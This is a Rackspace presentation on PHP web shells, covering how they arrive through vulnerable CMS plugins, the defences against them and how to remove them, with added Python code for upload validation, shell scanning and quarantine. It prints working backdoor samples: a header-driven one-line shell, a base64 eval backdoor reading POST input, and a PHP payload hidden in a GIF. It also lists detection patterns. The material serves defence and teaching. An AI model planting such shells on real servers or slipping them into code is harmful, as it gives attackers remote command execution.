An introduction to php shells
An introduction to PHP shells
Richard Mahoney, Developer Support Engineer
Created by: Richard Mahoney
Modified Date: 09/05/2013
Classification: Public
RACKSPACE® HOSTING | WWW.RACKSPACE.COM
About Me
•PHP developer before becoming a Linux SysAdmin 6 years ago
•Joined Rackspace in 2013
•Several years of experience with web app security
•Is a Certified Ethical Hacker
About this presentation
•What PHP shells are and why they exist
•Where they come from
•How to defend against the threat
•Removal
•Q & A
So, what is a PHP shell?
What is a PHP shell?
•A malicious file containing PHP functions such as eval() and shell_exec()
•Accepts input via $_GET, $_POST, HTTP headers and even $_COOKIE
•Usually obfuscated: eval(base64_decode('JF9HRVRbY10='));
•Used to run arbitrary commands supplied by the attacker
•The most common variant is the C99 shell
How much of a threat?
•Worst case: root compromise via a kernel exploit or simply by looking through files for passwords
•But that's not really needed...
•As the Apache user it can:
  •Be used to download, install and execute additional software to join IRC botnets or for Bitcoin mining
  •Steal data by using MySQL credentials found in PHP files
  •Host illegal material
  •Send out huge amounts of spam (very common)
  •Be used as a proxy for launching attacks on other servers, including those behind the same firewall
Here’s what one looks like
How did it get onto my server?
Where did it come from?
•The vast majority are via vulnerable third-party plugins for WordPress, Joomla etc.
•Automated bots scan for the presence of these plugins and notify the attacker
•The attacker then uploads the malicious code, typically to an /uploads or /media directory, by exploiting the vulnerable website
•The attacker visits the malicious shell script via a browser or by using a tool such as cURL
•All of these steps could be scripted to continually compromise hosts and build a botnet
•But don't forget (S)FTP or your own code as an attack vector
Defending against the threat
The golden rule
•Never trust user input
•Validate and sanitise as appropriate
•The contents of $_GET, $_POST, $_FILES, $_COOKIE, $_SERVER, $_ENV, and HTTP headers should be considered unsafe
•Use PHP functions such as filter_var()
•Strip null bytes from filenames by using trim()
•Check the contents of any file uploaded to the server. Do not rely on file extensions
•Or even the first few bytes of it – malicious code can be embedded inside image files like this GIF:
GIF89a^A???^A??????????????????!??^D^A????????????,????????????^A???^A??????^B^B
D^A???;???
<?php
@error_reporting(0); @set_time_limit(0); $lol = $_GET['lol']; $osc = $_GET['osc'];
if (isset($lol)) { eval(gzinflate(base64_decode('pZJda8IwFIb ...
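The upload check this slide calls for, written as an added example in Python rather than PHP (it is not code from the slides or from Rackspace): it allow-lists extensions, verifies the magic bytes for the claimed type, strips null bytes and path components from the name, and still rejects the file if a PHP open tag appears anywhere in the contents, which is the check that fails the GIF above even though its first bytes are a valid GIF header. The MAGIC table, the sample bytes and the function names are constructed for this example.

```python
import re
from typing import List

# Magic-byte signatures for the image types this upload handler accepts.
# Constructed allow-list for this example; extend it to match your application.
MAGIC = {
    "gif": (b"GIF87a", b"GIF89a"),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
}

# Anything that opens a PHP code block if the file is ever parsed by PHP.
# The signature check alone would pass the GIF on the slide; this is what fails it.
PHP_TAG = re.compile(rb"<\?(?:php\b|=)", re.IGNORECASE)


def sanitize_filename(filename: str) -> str:
    """Drop null bytes and any directory part, then trim surrounding whitespace."""
    no_nul = filename.replace("\x00", "")
    base = no_nul.replace("\\", "/").rsplit("/", 1)[-1]
    return base.strip()


def check_upload(filename: str, data: bytes) -> List[str]:
    """Return the reasons to reject an upload; an empty list means accept."""
    problems = []
    clean = sanitize_filename(filename)
    if clean != filename:
        problems.append("filename contained null bytes, path separators or padding")
    ext = clean.rsplit(".", 1)[-1].lower() if "." in clean else ""
    if ext not in MAGIC:
        problems.append("extension %r is not in the allow-list" % ext)
    elif not data.startswith(MAGIC[ext]):
        problems.append("contents do not start with a %s signature" % ext)
    # Scan the whole blob, not just the header: code can sit after the image data.
    if PHP_TAG.search(data):
        problems.append("PHP open tag found inside the file contents")
    return problems


# Constructed samples: a minimal 1x1 GIF, and the same GIF with a PHP block
# appended the way the slide's example does (with a harmless marker instead).
GOOD_GIF = (b"GIF89a\x01\x00\x01\x00\x80\x00\x00\xff\xff\xff\x00\x00\x00"
            b",\x00\x00\x00\x00\x01\x00\x01\x00\x00\x02\x02D\x01\x00;")
BAD_GIF = GOOD_GIF + b"\n<?php /* constructed marker */ ?>"

if __name__ == "__main__":
    for name, blob in (("photo.gif", GOOD_GIF), ("photo.gif", BAD_GIF),
                       ("shell.php\x00.gif", GOOD_GIF)):
        print(repr(name), check_upload(name, blob) or "accepted")
```

The point of returning every reason rather than the first one is that the log entry then shows whether an upload merely had a stray extension or was actually carrying code, which is the difference between a user error and an attack attempt worth alerting on.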
Another example
•Grepping your codebase for strings like 'eval(' will result in a lot of hits in a standard WordPress install due to its use in JavaScript libraries:
root@www:/var/applications/example.com/public# grep 'eval(' * -R | wc -l
33
•But it's easy for an attacker to evade scans. This is a fully working PHP shell:
<?php $_SERVER['HTTP_A']($_SERVER['HTTP_B']); ?>
Where the HTTP header A is set to the string “eval”, and B can be any PHP function.
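A scanner that cuts down the false positives of a raw grep for eval( and still catches the header-driven one-liner above, as an added example (Python; not code from the slides): it only reads files PHP would execute, so JavaScript libraries are skipped, and it flags a superglobal element being called as a function, as well as eval() and the command-execution functions wrapped around decoded or request data. The indicator list, the extension set and the sample files are constructed for this example and are not exhaustive.

```python
import os
import re
from typing import Dict, List

# Only file types PHP will execute are inspected; everything else (e.g. .js
# libraries) is skipped, which removes most of the noise of a raw grep.
PHP_EXTENSIONS = {".php", ".phtml", ".php5", ".inc"}

# Indicator patterns with a short label each. Constructed for this example.
INDICATORS = [
    ("eval-of-decoded-data",
     re.compile(rb"eval\s*\(\s*(?:gzinflate|gzuncompress|base64_decode|str_rot13)\s*\(")),
    ("eval-of-request-data",
     re.compile(rb"eval\s*\(\s*\$_(?:GET|POST|REQUEST|COOKIE|SERVER)\b")),
    ("variable-function-from-request",
     # $_SERVER['HTTP_A']($_SERVER['HTTP_B']) and friends: a superglobal
     # element used directly as the function name.
     re.compile(rb"\$_(?:GET|POST|REQUEST|COOKIE|SERVER)\s*\[[^\]]*\]\s*\(")),
    ("command-execution-of-request-data",
     re.compile(rb"(?:shell_exec|system|passthru|exec|popen|proc_open)\s*\(\s*"
                rb"\$_(?:GET|POST|REQUEST|COOKIE|SERVER)\b")),
]


def scan_source(path: str, data: bytes) -> List[str]:
    """Return the indicator labels found in one file (empty list if nothing tripped)."""
    if os.path.splitext(path)[1].lower() not in PHP_EXTENSIONS:
        return []
    return [label for label, pat in INDICATORS if pat.search(data)]


def scan_tree(root: str) -> Dict[str, List[str]]:
    """Walk a document root and report the files that trip at least one indicator."""
    hits = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            with open(full, "rb") as fh:
                found = scan_source(full, fh.read())
            if found:
                hits[full] = found
    return hits


# Constructed sample files, not files from the original slides.
SAMPLES = {
    "wp-includes/js/lib.js": b"function f(s){return eval('(' + s + ')');}",
    "wp-content/uploads/404.php": b"<?php eval(base64_decode($_POST['e'])); ?>",
    "wp-content/uploads/header.php": b"<?php $_SERVER['HTTP_A']($_SERVER['HTTP_B']); ?>",
    "wp-content/themes/t/functions.php": b"<?php function add_assets() { wp_enqueue_script('app'); } ?>",
}


def scan_samples() -> Dict[str, List[str]]:
    """Run the scanner over the in-memory samples (used for the demonstration)."""
    return {path: scan_source(path, data) for path, data in SAMPLES.items()}


if __name__ == "__main__":
    for path, labels in scan_samples().items():
        print(path, "->", labels or "clean")
```

Pattern matching like this is still only a first pass: an attacker can split strings or use other indirection, so treat the scanner as a way to prioritise review, and pair it with the ownership and timestamp checks from the removal slides (files owned by the web server user in an uploads directory are suspicious regardless of content).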
What else can I do?
•Create a .htaccess file in any directories which shouldn't contain PHP code
•In the contents:
php_flag engine off
•Ensure SFTP/FTP passwords are strong
•Apache log files should be owned by root to prevent LFI (local file inclusion) attacks
•Never run Apache as root
•Install antivirus software and set it to scan on write
Removal
Example of a compromised server
This /images directory contains 3 PHP shells:
[root@web1 images]# ls -l *.php
-rw-r--r-- 1 apache apache 123617 Jun 19 16:09 404.php
-rw-r--r-- 1 apache apache 11684 Jun 19 17:34 mlr2.php
-rw-r--r-- 1 apache apache 24364 Jun 30 17:43 wso.php
The contents:
<?php
eval(base64_decode('aWYoaXNzZXQoJF9QT1NUWydlJ10pKWV2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1RbJ2UnXSkpO2VjaG8gJzM3MzcyYjM3MzIyZTMyMzMzMDJlMzEzNTM4M2E3Njc4MzI2MzZiNzI2NTNlNzIzMzY1NjA2MzY4Jzs=')); ?>
Example of a compromised server
Which evaluates to:
if(isset($_POST['e']))eval(base64_decode($_POST['e']));echo '37372b37322e3233302e3135383a767832636b72653e723365606368';
To make these safe, move them to somewhere like "/root/compromised_files" if you want to investigate further, or just delete them. If you can't or don't want to move the files, chmod them to 000 and set the owner to root to disable access:
[root@web1 images]# ls -l *.php
---------- 1 root root 123617 Jun 19 16:09 404.php
---------- 1 root root 11684 Jun 19 17:34 mlr2.php
---------- 1 root root 24364 Jun 30 17:43 wso.php
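The two options on this slide (move the files to a quarantine directory, or leave them in place with mode 000 and owner root) as an added Python example, not code from the slides: quarantine() keeps the original path in the new filename so the investigation can still tell where each file was found, and neutralize_in_place() only attempts the chown when running as root, since it would fail otherwise. The function names, the timestamped naming scheme and the default quarantine directory (taken from the slide's suggestion) are this example's own choices.

```python
import os
import shutil
import stat
import time

# Default follows the slide's suggestion; any directory outside the web root
# that the web server user cannot read will do.
QUARANTINE_DIR = "/root/compromised_files"


def quarantine(path: str, dest_dir: str = QUARANTINE_DIR) -> str:
    """Move a suspected shell out of the web root and lock it down.

    The original absolute path is folded into the new name
    (/var/www/images/wso.php -> <epoch>_var__www__images__wso.php) so the
    quarantine directory is self-documenting. Returns the new path.
    """
    os.makedirs(dest_dir, mode=0o700, exist_ok=True)
    safe_name = os.path.abspath(path).strip("/").replace("/", "__")
    dest = os.path.join(dest_dir, "%d_%s" % (int(time.time()), safe_name))
    shutil.move(path, dest)
    # Mode 000: nothing can read or execute it until an investigator chmods it back.
    os.chmod(dest, 0)
    return dest


def neutralize_in_place(path: str) -> int:
    """Alternative when the file must stay where it is: mode 000, owner root.

    chown needs root, so it is skipped when running unprivileged; chmod still
    applies because the caller owns the file. Returns the resulting permission
    bits, which should be 0.
    """
    if os.geteuid() == 0:
        os.chown(path, 0, 0)
    os.chmod(path, 0)
    return stat.S_IMODE(os.stat(path).st_mode)


if __name__ == "__main__":
    import tempfile
    # Constructed demo: a fake shell in a scratch directory, not a real web root.
    scratch = tempfile.mkdtemp()
    fake = os.path.join(scratch, "wso.php")
    with open(fake, "w") as fh:
        fh.write("<?php /* constructed placeholder */ ?>")
    print("quarantined to", quarantine(fake, os.path.join(scratch, "compromised_files")))
```

Whichever option is used, record the file's original path, owner, size and modification time first (the ls -l output above is exactly that), because the timestamps are what let you go back to the access logs and find the request that created the file.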
Next steps
•Check for unusual files in places such as /tmp and /var/cache
•Use "ls -la" to show hidden directories
•Study the output of "lsof"
•If malicious files owned by root are found, wipe the server and reinstall
•Update all software on the server, including any CMS addons/plugins
•Perform a virus scan
Any Questions?
Further reading
The Open Web Application Security Project – (OWASP) Top 10: owasp.org
The PHP Security Guide: phpsec.org
/r/Netsec: reddit.com/r/netsec
RACKSPACE® HOSTING | 5000 WALZEM ROAD | SAN ANTONIO, TX 78218
US SALES: 1-800-961-2888 | US SUPPORT: 1-800-961-4454 | WWW.RACKSPACE.COM
RACKSPACE® HOSTING | © RACKSPACE US, INC. | RACKSPACE® AND FANATICAL SUPPORT® ARE SERVICE MARKS OF RACKSPACE US, INC. REGISTERED IN THE UNITED STATES AND OTHER COUNTRIES. | WWW.RACKSPACE.COM
RACKSPACE® HOSTING | 5 MILLINGTON ROAD | HAYES, UNITED KINGDOM UB3 4AZ
UK SALES: +44 (0)20 8712 6507 | UK SUPPORT: 0800 988 0300 | WWW.RACKSPACE.CO.UK